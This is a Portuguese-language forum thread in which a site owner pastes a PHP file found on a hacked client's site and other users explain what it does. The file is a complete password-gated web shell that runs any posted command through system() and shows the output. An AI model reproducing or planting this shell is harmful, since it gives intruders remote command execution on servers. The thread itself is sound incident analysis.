Hackers

[Milena]

Olá a hp de um cliente meu foi hackeado, e econtei uma página em php lá, mas a pergunta é... essa página pode ter feito alguma dano, já que o sevirdo onde esta hospedada a página é asp????

o códiga da página q encontrei:

<?
$cmd = $_POST['cmd'];
// $output = system($cmd);
$x = $_GET['team'];
if ($x != "freshmaker") {
	die("200 OK");
} 
if (!$cmd) {
echo "
<form action='$PHP_SELF?team=freshmaker' method=post>
<input type=hidden name=team value=freshmaker>
<input type=text name=cmd value=\"$cmd\" size=100>
</form>";
} else {
echo "
<form action='$PHP_SELF?team=freshmaker' method=post>
<input type=hidden name=team value=freshmaker>
<input type=text name=cmd value=\"$cmd\" size=100>
</form>";
echo "<TEXTAREA COLS='100' ROWS='30' STYLE='font-family: verdana; font-size: 12px;'>";
// outputing
ob_start( );
      system("$cmd");
      $output = ob_get_contents();
    ob_end_clean( );
//	echo $output;
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
echo "\n\n\nFreshmaker Crew";
// outputing
echo "</TEXTAREA>";
}
?>

[BEOC]

Esta página pode danificar teu sistema inteiro cara, e tua hp também.

falou'ss

[marcelo]

Queria tirar uma duvida aproveitando o encejo .. o que seria $PHP_SELF;

[Milena]

Mas de modo geral o que essa página pode fazer?

roubar senhas ?

deletar arquivos?

é que infelizmente não entendo nada de php...

mas garanto a vocês ... depois disso .. com certeza vou aprender .

[ffiction]

BEOC... o que essa pagina pode fazer?? nada... ela nada faz alem de excrever um form na pagina... e considerando que seaj um server em asp se não ouver nenhum webservice que seja em xml ela num faz nada.. perde tottal "poder" certo???

comenta esse codigo que tem coisas que num sei pra que servem ali.. tipo essa parte

system("$cmd");
     $output = ob_get_contents();
   ob_end_clean( );

falows...

[felipefrancesco]

é...hehehe....nesse código, o sistema vai executar um comando no sistema operacional, com o que o usuário escrever no campo text, escrevendo o resultado no textarea.

Se realmente não tem servidor de PHP instalado tudo bem. Agora, se tiver, se o servidor não tiver com algum meio de segurança pra impedir que o script execute comandos no SO, então o cara pode obter controle da máquina. A página vai virar um verdadeiro terminal, como se ele estivesse no servidor.

[Milena]

Valeu pelas explicações .

[Guest - wilson -]

$cmd = $_POST['cmd'];

system("$cmd");

tudo é relativo ao que entendi a página geraria um form com um text area...

Provavelmente eles usariam um outro form com o metodo POST para chamar esta página, o que gravaria na váriavel o campo CMD algum programa .exe

posteriormente eles mandam executar o comando SYSTEM que chama um programa externo .exe com o valor sugerido na variavel CMD...

vide comando system, também não o conhecia, http://br2.php.net/manual/pt_BR/function.system.php

---

os efeitos dependeria do que esse exe poderia fazer...

porém se é um server ASP o codigo não rodaria não... ao que sei mesmo que se estivesse num servidor windows rodando asp e php ao mesmo tempo (rodando em portas diferentes) cada webserver tem seu diretório WWW o que implicaria no caso do fulano querer rodar o código php dentro do sistema asp pois o código precisa ser interpretado para funcionar...

se falei besteira por favor me corrijam,